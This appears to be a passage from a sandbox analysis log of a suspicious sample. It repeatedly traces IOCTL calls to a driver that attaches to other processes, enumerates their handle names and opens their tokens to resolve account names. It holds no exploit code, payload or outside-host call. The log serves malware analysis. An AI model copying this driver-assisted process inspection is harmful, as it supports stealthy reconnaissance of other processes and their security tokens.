(HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.620] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.620] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.620] PsAcquireProcessExitSynchronization () returned 0x0 [0226.620] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0) [0226.621] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002119250, HandleInformation=0x0) returned 0x0 [0226.621] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.621] PsReleaseProcessExitSynchronization () returned 0x2 [0226.621] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0226.621] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.621] ObfDereferenceObject (Object=0xfffffa8002119250) returned 0x1 [0226.621] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.621] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.621] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.621] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.621] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.621] PsAcquireProcessExitSynchronization () returned 0x0 [0226.621] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880052b35d0) [0226.621] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.621] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.621] PsReleaseProcessExitSynchronization () returned 0x2 [0226.621] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0226.621] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.621] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.621] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.621] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x974) returned 0xc8 [0226.621] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.622] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002123060, HandleInformation=0x0) returned 0x0 [0226.622] ObOpenObjectByPointer (in: Object=0xfffffa8002123060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.622] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x14 [0226.622] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.622] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.622] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.622] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.622] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.623] CloseHandle (hObject=0xc4) returned 1 [0226.624] CloseHandle (hObject=0xc8) returned 1 [0226.624] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.624] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.624] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.624] PsAcquireProcessExitSynchronization () returned 0x0 [0226.624] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0) [0226.624] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020e7840, HandleInformation=0x0) returned 0x0 [0226.624] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.624] PsReleaseProcessExitSynchronization () returned 0x2 [0226.624] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0226.624] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.624] ObfDereferenceObject (Object=0xfffffa80020e7840) returned 0x1 [0226.624] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.624] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.624] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.624] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0226.624] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.624] PsAcquireProcessExitSynchronization () returned 0x0 [0226.624] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0) [0226.624] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ffadd0, HandleInformation=0x0) returned 0x0 [0226.624] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.625] PsReleaseProcessExitSynchronization () returned 0x2 [0226.625] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0226.625] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.625] ObfDereferenceObject (Object=0xfffffa8001ffadd0) returned 0x1 [0226.625] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.625] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.625] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.625] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.625] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.625] PsAcquireProcessExitSynchronization () returned 0x0 [0226.625] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880052b35d0) [0226.625] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.625] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.625] PsReleaseProcessExitSynchronization () returned 0x2 [0226.625] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0226.625] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.625] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.625] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.625] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x984) returned 0xc8 [0226.625] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.625] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002133b30, HandleInformation=0x0) returned 0x0 [0226.625] ObOpenObjectByPointer (in: Object=0xfffffa8002133b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.625] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x14 [0226.625] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.626] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.626] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.626] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.626] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.627] CloseHandle (hObject=0xc4) returned 1 [0226.627] CloseHandle (hObject=0xc8) returned 1 [0226.627] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.627] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.627] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.627] PsAcquireProcessExitSynchronization () returned 0x0 [0226.627] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0) [0226.628] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800212b860, HandleInformation=0x0) returned 0x0 [0226.628] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.628] PsReleaseProcessExitSynchronization () returned 0x2 [0226.628] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0226.628] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.628] ObfDereferenceObject (Object=0xfffffa800212b860) returned 0x1 [0226.628] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.628] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.628] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.628] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0226.628] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.628] PsAcquireProcessExitSynchronization () returned 0x0 [0226.628] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0) [0226.628] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002131600, HandleInformation=0x0) returned 0x0 [0226.628] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.628] PsReleaseProcessExitSynchronization () returned 0x2 [0226.628] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0226.628] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.628] ObfDereferenceObject (Object=0xfffffa8002131600) returned 0x1 [0226.628] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.628] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.628] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.628] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.628] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.629] PsAcquireProcessExitSynchronization () returned 0x0 [0226.629] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0) [0226.629] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.629] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.629] PsReleaseProcessExitSynchronization () returned 0x2 [0226.629] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0226.629] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.629] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.629] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.629] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.629] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.629] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0226.629] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.629] PsAcquireProcessExitSynchronization () returned 0x0 [0226.629] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0) [0226.629] ObReferenceObjectByHandle (in: Handle=0x7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002138310, HandleInformation=0x0) returned 0x0 [0226.629] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.629] PsReleaseProcessExitSynchronization () returned 0x2 [0226.629] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0226.629] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.629] ObfDereferenceObject (Object=0xfffffa8002138310) returned 0x1 [0226.629] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.629] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.629] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.629] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.629] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.629] PsAcquireProcessExitSynchronization () returned 0x0 [0226.629] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880052b35d0) [0226.630] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019027a0, HandleInformation=0x0) returned 0x0 [0226.630] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.630] PsReleaseProcessExitSynchronization () returned 0x2 [0226.630] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0226.630] ObQueryNameString (in: Object=0xfffff8a0019027a0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.630] ObfDereferenceObject (Object=0xfffff8a0019027a0) returned 0x1 [0226.630] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.630] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x994) returned 0xc8 [0226.630] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.630] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80021395d0, HandleInformation=0x0) returned 0x0 [0226.630] ObOpenObjectByPointer (in: Object=0xfffffa80021395d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.630] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x14 [0226.630] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.630] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.630] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.630] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.630] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.632] CloseHandle (hObject=0xc4) returned 1 [0226.632] CloseHandle (hObject=0xc8) returned 1 [0226.632] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.632] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.632] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.632] PsAcquireProcessExitSynchronization () returned 0x0 [0226.632] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0) [0226.632] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800213c390, HandleInformation=0x0) returned 0x0 [0226.632] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.632] PsReleaseProcessExitSynchronization () returned 0x2 [0226.632] ObfDereferenceObject (Object=0xfffffa80021395d0) returned 0x12 [0226.632] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.632] ObfDereferenceObject (Object=0xfffffa800213c390) returned 0x1 [0226.632] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.632] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.632] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.632] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0226.632] PsLookupProcessByProcessId (in: ProcessId=0x994, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.632] PsAcquireProcessExitSynchronization () returned 0x0 [0226.632] KeStackAttachProcess (in: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80021395d0, ApcState=0xfffff880052b35d0) [0226.632] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800213db50, 